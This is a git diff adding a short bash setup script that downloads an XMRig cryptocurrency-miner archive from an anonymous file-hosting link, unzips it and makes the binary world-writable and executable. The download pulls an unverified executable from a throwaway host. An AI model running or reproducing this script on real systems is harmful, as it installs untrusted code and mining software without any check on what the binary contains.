diff --git a/other/xmrig/amd64-NoCUDA.sh b/other/xmrig/amd64-NoCUDA.sh new file mode 100644 index 0000000..8701da7 --- /dev/null +++ b/other/xmrig/amd64-NoCUDA.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +sudo apt update +sudo apt install -y wget unzip +wget https://small.fileditch.ch/s3/DEieacPfmRvhhMFOgIal.zip +unzip DEieacPfmRvhhMFOgIal.zip +chmod ugo+rwx xmrig \ No newline at end of file